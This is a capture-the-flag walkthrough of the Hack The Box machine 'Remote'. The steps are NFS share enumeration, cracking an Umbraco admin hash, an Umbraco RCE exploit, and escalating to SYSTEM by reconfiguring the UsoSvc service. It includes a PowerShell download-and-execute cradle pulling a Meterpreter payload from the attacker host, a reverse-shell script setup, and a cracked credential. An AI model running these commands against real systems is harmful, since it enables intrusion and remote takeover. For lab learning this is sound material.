This is a detailed walk-thru for remote.htb written by dR1PPy
The challenge given by Remote will have you breaking into the Umbraco CMS system on multiple levels.
Enumeration
Nmap scan report for 10.10.10.180
Host is up, received user-set (0.11s latency).
Scanned at 2020-03-30 22:14:16 MDT for 209s
Not shown: 993 closed ports
Reason: 993 conn-refused
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
2049/tcp open mountd syn-ack 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m29s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 45222/tcp): CLEAN (Couldn't connect)
| Check 2 (port 53672/tcp): CLEAN (Couldn't connect)
| Check 3 (port 19556/udp): CLEAN (Timeout)
| Check 4 (port 15893/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-31T04:19:18
|_ start_date: N/A
During some manual enumeration we come across possible usernames.
Usernames:
Using the information on the website we create a username file to help us in our attack.
users.txt
Jan Skovgaard
Matt Brailsford
Lee Kelleher
Jeavon Leopold
Jeroen Breuer
We also find an open share which seems to hold a backup files. We mount this directory locally to review it more closely.
showmount -e remote.htb
Export list for remote.htb:
/site_backups (everyone)
sudo mount 10.10.10.180:/site_backups /tmp/001
cd /tmp/001
[dr1ppy:/tmp/001] $ ls -lha
total 179K
drwx------ 2 nobody 4294967294 4.0K Feb 23 11:35 .
drwxrwxrwt 37 root root 56K Mar 30 23:41 ..
drwx------ 2 nobody 4294967294 64 Feb 20 10:16 App_Browsers
drwx------ 2 nobody 4294967294 4.0K Feb 20 10:17 App_Data
drwx------ 2 nobody 4294967294 4.0K Feb 20 10:16 App_Plugins
drwx------ 2 nobody 4294967294 64 Feb 20 10:16 aspnet_client
drwx------ 2 nobody 4294967294 48K Feb 20 10:16 bin
drwx------ 2 nobody 4294967294 8.0K Feb 20 10:16 Config
drwx------ 2 nobody 4294967294 64 Feb 20 10:16 css
-rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
-rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
drwx------ 2 nobody 4294967294 4.0K Feb 20 10:16 Media
drwx------ 2 nobody 4294967294 64 Feb 20 10:16 scripts
drwx------ 2 nobody 4294967294 8.0K Feb 20 10:16 Umbraco
drwx------ 2 nobody 4294967294 4.0K Feb 20 10:16 Umbraco_Client
drwx------ 2 nobody 4294967294 4.0K Feb 20 10:16 Views
-rwx------ 1 nobody 4294967294 28K Feb 19 22:57 Web.config
The entire backup is about 80mb so let’s just copy the data over, to make it easier to analyze.
rsync -avz /tmp/001/* .
This will also allows a quick view of all the files contained in the backup.
While waiting for the backup to complete we look over the files and notice is they appear to be the root umbraco folder.
We verify this by trying to access the following URL.
https://10.10.10.180/umbraco/
Gaining Access
A Google search shows us the App_Data folder is where most of our Umbraco configuration would be found.
strings Umbraco.sdf
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
We crack the password for Administrator
hashcat -m 100 hash.txt -o cracked-hash.txt /TOOL/rockyou.txt
hashcat (v5.1.0) starting...
* Device #2: Not a native Intel OpenCL runtime. Expect massive speed loss.
You can use --force to override, but do not report related errors.
OpenCL Platform #1: Intel(R) Corporation
========================================
* Device #1: Intel(R) Core(TM) i7-3632QM CPU @ 2.20GHz, 3990/15961 MB allocatable, 8MCU
OpenCL Platform #2: The pocl project
====================================
* Device #2: pthread-Intel(R) Core(TM) i7-3632QM CPU @ 2.20GHz, skipped.
Hashfile 'hash.txt' on line 2 (jxDUCc...KA3htB/ERiyJUAdpTtFeTpnIk9CiHts=): Token length exception
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=8 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=3 -D DGST_R1=4 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=5 -D KERN_TYPE=100 -D _unroll'
* Device #1: Kernel m00100_a0-pure.8a2b2872.kernel not found in cache! Building may take a while...
Compilation started
Compilation done
Linking started
Linking done
Device build started
Device build done
Kernel <gpu_decompress> was not vectorized
Kernel <gpu_memset> was not vectorized
Kernel <gpu_atinit> was not vectorized
Kernel <m00100_mxx> was not vectorized
Kernel <m00100_sxx> was not vectorized
Done.
Dictionary cache hit:
* Filename..: /TOOL/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
Session..........: hashcat
Status...........: Cracked
Hash.Type........: SHA1
Hash.Target......: b8be16afba8c314ad33d812f22a04991b90e2aaa
Time.Started.....: Fri Apr 24 09:29:36 2020 (3 secs)
Time.Estimated...: Fri Apr 24 09:29:39 2020 (0 secs)
Guess.Base.......: File (/TOOL/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4227.9 kH/s (0.65ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 9830400/14344384 (68.53%)
Rejected.........: 0/9830400 (0.00%)
Restore.Point....: 9822208/14344384 (68.47%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: badboi5410 -> babypolk07
Started: Fri Apr 24 09:29:30 2020
Stopped: Fri Apr 24 09:29:40 2020
cat cracked-hash.txt
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese
Now with our password we confirm our access thru the CMS portal.
https://10.10.10.180/umbraco/
Now we have access to the portal and can confirm the version of Umbraco
A quick web search leads us to the following RCE PoC code.
https://github.com/noraj/Umbraco-RCE
Looks like we should be able to get the RCE working on our target.
First we prepare a quick reverse Powershell script.
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcpOneLine.ps1
sed -i 's/#$client/$client/g' Invoke-PowerShellTcpOneLine.ps1 && sed -i 's/#$sm/$sm/g' Invoke-PowerShellTcpOneLine.ps1 && sed -i 's/192.168.254.1/10.10.14.32/g' Invoke-PowerShellTcpOneLine.ps1
Then we run our exploit.
python ./exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.32:6767/windows-meterpreter-stageless-reverse-tcp-8383.ps1')"
And we get our first shell.
nc -lvp 4545
listening on [any] 4545 ...
connect to [10.10.14.32] from remote.htb [10.10.10.180] 49747
id
PS C:\windows\system32\inetsrv>
ԅ(≖‿≖ԅ)
Escalating Privileges
Now we have a solid shell we run thru our starting lineup of Windows Enumeration scripts.
winPEAS
PowerUp
Watson
Seatbelt
Powerless
JAWS
When we get to the 2nd script where we find a bit of Juicy information.
[*] Checking service permissions...
ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart : True
It appears we can change and restart the ‘UsoSvc’ which we quickly confirm with another payload
copy \\10.10.14.32\drip\payload.exe C:\Windows\System32\spool\drivers\color\exploit.exe
cmd /c sc qc UsoSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: UsoSvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\system32\svchost.exe -k netsvcs -p
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
PS C:\Windows\System32\spool\drivers\color> cmd /c sc config "UsoSvc" binPath="C:\Windows\System32\spool\drivers\color\exploit.exe"
[SC] ChangeServiceConfig SUCCESS
PS C:\Windows\System32\spool\drivers\color> cmd /c sc qc UsoSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: UsoSvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\System32\spool\drivers\color\exploit.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
PS C:\Windows\System32\spool\drivers\color> cmd /c sc stop "UsoSvc"
SERVICE_NAME: UsoSvc
TYPE : 30 WIN32
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x3
WAIT_HINT : 0x7530
PS C:\Windows\System32\spool\drivers\color> cmd /c sc start "UsoSvc"
And we get our root shell =^)
But it quickly dies =^(
So we enable the MSF Auto Migration Post script to jump us to another process before our shell dies.
set AutoRunScript post/windows/manage/migrate
Now we start the service again and we get our final shell and grab our root flag.
Resources
As always here is a list of resources and reference materials used for this walk thru
LINQPad
https://www.linqpad.net/Download.aspx
Umbraco backup and deploying notes
https://stackoverflow.com/questions/36608378/which-umbraco-folders-do-i-need-to-backup-after-deploying-from-vs-and-adding-to
Umbraco RCE
https://github.com/noraj/Umbraco-RCE
Invoke-PowerShellTcpOneLine.ps1
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcpOneLine.ps1
PowerUp.ps1
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
Abusing Weak Service Permissions
https://pentestlab.blog/2017/03/30/weak-service-permissions/
List of writeable Windows Paths
https://raw.githubusercontent.com/api0cradle/UltimateAppLockerByPassList/master/Generic-AppLockerbypasses.md
[security.pimp] 